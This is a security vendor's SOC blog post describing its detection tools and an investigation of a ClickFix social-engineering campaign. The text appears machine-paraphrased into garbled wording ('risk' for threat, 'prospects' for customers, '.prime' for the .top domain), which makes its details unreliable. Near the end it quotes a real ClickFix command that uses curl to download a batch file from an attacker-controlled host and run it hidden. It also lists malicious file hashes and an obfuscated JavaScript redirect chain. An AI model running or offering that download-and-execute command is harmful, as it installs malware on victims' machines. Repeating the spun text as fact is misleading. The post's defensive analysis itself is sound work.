[ad_1]
A SOC Toolbelt
To preserve tempo with quickly evolving threats and the reducing breakout occasions of attackers, the LevelBlue safety operations crew leverages a number of instruments and key partnerships to shorten the time between detection and response. Below are some examples of the instruments utilized by our SOC and a few of the circumstances wherein every instrument can be used.
A Partnership with SentinelOne
Through LevelBlue’s Managed Endpoint Security with SentinelOne, our SOC has supplied distinctive worth with higher safety and endpoint visibility to our prospects. The SOC was in a position to vastly scale back the time between detection and response with STAR (Storyline Active Response) alarms inside SentinelOne. These STAR alarms are customized constructed by our crew and are knowledgeable by proactive detections from our risk hunters round current threats and TTPs (Techniques, Tactics, and Procedures).
By using risk intelligence reviews and information at hand, our crew was in a position to carry out a deeper assessment into the TTPs of current threats. This allowed for the creation of customized guidelines to extra rapidly detect IOCs (Indicators of Compromise) inside our prospects’ environments. Our LevelBlue Labs risk intelligence crew additionally utilized this info to create new guidelines in USM Anywhere, our open XDR platform.
As a trusted safety companion, LevelBlue is all the time striving to enhance our detection and response occasions to extend worth and supply extra proactive assist to our prospects. These instruments are very important for us to enhance response occasions and forestall threats from affecting our prospects.
Bundling Managed Endpoint Security and Managed Threat Detection and Response is a superb choice for patrons who lack information ingestion from endpoints in USMA and need improved visibility. The bundle additionally advantages prospects seeking to stability the price of third-party safety companions with the prices of further monitoring instruments. Instead of shopping for a number of instruments to convey probably noisy information into USMA, bundling supplies complete visibility throughout your endpoints together with the 24/7 monitoring that’s a part of our Managed Threat Detection and Response provide.
Open Threat Exchange (OTX)
The LevelBlue Labs Open Threat Exchange (OTX) is one other integral instrument our analysts rely upon throughout alarm triage and investigation. This platform is among the largest risk intelligence communities with over 330K+ members worldwide.
LevelBlue Labs constantly updates OTX, and risk intelligence from OTX integrates seamlessly into LevelBlue’s USMA platform. Our prospects’ environments are scanned for OTX pulse matches and IOCs. If an indicator from a pulse the client is subscribed to is found of their atmosphere, an alarm is generated.
Upon inspecting an alarm in USMA, analysts are directed to the related pulse. The analyst can use the extra IOCs related to that pulse to additional their investigation.
Centralizing this info in USMA helps our analysts streamline incident triage and these pulses may be in contrast with different Open-Source Intelligence (OSINT) to present analysts extra context of their investigation. Analysts may also use the OTX Pulse ID straight inside USMA to question the shoppers’ atmosphere for any further IOCs related to the risk being investigated.

Figure 1: Event search of buyer occasion utilizing OTX ID
STAR Rules
The LevelBlue SOC has additionally created a customized alerting system based mostly on high-fidelity detection strategies that has elevated response occasions by bringing these alerts to the forefront of our analysts’ consideration. These high-fidelity strategies, whether or not associated to customized STAR guidelines or person compromise detections, are simply one other instance of the proactive work our SOC crew does to enhance worth for our prospects.
SentinelOne’s STAR guidelines have confirmed to be a useful addition to the detection toolset already utilized by the MDR SOC. When a risk is detected and an alarm has been raised, a SOC analyst will use totally different instruments for analyzing the risk and its associated artifacts.
The LevelBlue SOC Investigates: ClickFix
ClickFix is a social engineering marketing campaign that exploits the looks of legitimacy to trick victims into executing malicious scripts. In the next investigation, the SOC used a number of instruments together with Joe’s Sandbox, SentinelOne Deep Visibility, and SentinelOne Blocklist to research a ClickFix assault. The investigation started when the SOC obtained an alarm for a command line that’s indicative of ClickFix malware (see determine 2).

Figure 2: ClickFix alarm in USMA
The command line proven above allowed our crew to acquire the file and knowledge from that file. With this, our crew might search throughout our buyer base to find out if the file existed in some other environments and add the file hashes to our world SentinelOne blocklist.
To assessment this command line, the SOC would usually make the most of a web based Sandbox service comparable to Joe’s Sandbox or AnyRun. Joe’s Sandbox is preferable within the occasion there’s buyer information current, as a result of it’s run in a personal tenant. AnyRun can also be a strong instrument, however their free service isn’t personal and used solely whether it is confirmed that no buyer information is contained.
After operating the command line above in Joe’s Sandbox, we obtained an in-depth exercise report (see determine 3 under).

Figure 3: Initial command line executed in ClickFix assault
After operating the command in Joe’s Sandbox, nothing popped up on the entrance finish, however we did get a listing of suspicious information dropped within the report that was generated (see determine 4 under).

Figure 4: List of suspicious information from Joe’s Sandbox report
From the file we have been in a position to retrieve the SHA1 hashes, and seek for potential compromise throughout our bundled prospects’ environments. Using SentinelOne Deep Visibility, our SOC crew wrote a easy question looking the File Hash fields for any of the hashes obtained in our report:
#hash comprises ( “A48C95DF3D802FFB6E5ECADA542CC5E028192F2B” , “7EC84BE84FE23F0B0093B647538737E1F19EBB03” , “C2E5EA8AFCD46694448D812D1FFCD02D1F594022” , “3D199BEE412CBAC0A6D2C4C9FD5509AD12A667E7” , “98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07” , “01873977C871D3346D795CF7E3888685DE9F0B16” , “C4E27A43075CE993FF6BB033360AF386B2FC58FF” , “906F7E94F841D464D4DA144F7C858FA2160E36DB” , “A556209655DCB5E939FD404F57D199F2BB6DA9B3” , “AD464EB7CF5C19C8A443AB5B590440B32DBC618F” )
Running this question confirmed us 5 detections from an incident that occurred every week prior in a distinct buyer’s atmosphere (see determine 5 under).

Figure 5: Detections from question looking for hashes obtained in report
Our crew additionally used SentinelOne’s Blocklist function so as to add these hashes to blocklist at a worldwide scope stage to make sure the file is killed and quarantined if detected in a buyer atmosphere (see determine 6).

Figure 6: Adding SHA1 hash of NetSupport RAT to SentinelOne world blocklist
When conducting a static evaluation of an internet site or potential phishing hyperlink, our analysts will usually use a service that visits the location and supplies a screenshot of the web page, together with info together with the web page supply code, redirects, scripts, and any pictures. In the next situation, our crew obtained an alarm for a DNS request to a suspicious area that’s included in our OTX Pulses (determine 7).

Figure 7: OTX alarm in USMA for compromised web site answerable for ClickFix assault
Upon preliminary assessment, the area appeared to belong to a traditional journey web site. Our crew then inspected the community site visitors from the web site scan within the HTTP tab under and regarded for any redirects that occurred through the scan within the Redirects tab (see determine 8).

Figure 8: URL Scan of the compromised website islonline[.]org
Under the HTTP tab, our crew noticed {that a} file titled j.js hosted on the location navigated to the location hxxps[://]lang3666[.]prime/lv/xfa[.].

Figure 9: Redirect to suspicious js file and .prime area
By operating a URL scan, our analysts have been in a position to retrieve the supply code of the js file:

Figure 10: Source code of js file hosted on .prime area
Further assessment of the file revealed an obfuscated script that’s used to find out if the person agent is a cell phone or desktop. The script then generates an 8- digit identifier which is then appended to the URL hxxps[://]lang3666[.]prime/lv/index[.]php?. This leads to downloading one other script to get the ultimate payload. ClickFix assaults usually comply with this chain of occasions, and end in a command much like the one pictured under:
Cmd.exe /c curl.exe -k -Ss -X POST https://pravaix[.]top/lv/lll[.]php -o “C:UsersPublicjkdfgf.bat” && begin /min “” C:UsersPublic jkdfgf.bat
Conclusion
As seen within the ClickFix investigation above, USM Anywhere’s integrations allow the LevelBlue SOC to vastly scale back the time between detection and response.
You can learn extra about ClickFix and the LevelBlue SOC’s suggestions to guard your environments within the LevelBlue Threat Trends Report, Fool Me Once: How Cybercriminals Are Mastering the Art of Deception.
The content material supplied herein is for basic informational functions solely and shouldn’t be construed as authorized, regulatory, compliance, or cybersecurity recommendation. Organizations ought to seek the advice of their very own authorized, compliance, or cybersecurity professionals concerning particular obligations and danger administration methods. While LevelBlue’s Managed Threat Detection and Response options are designed to assist risk detection and response on the endpoint stage, they aren’t an alternative to complete community monitoring, vulnerability administration, or a full cybersecurity program.
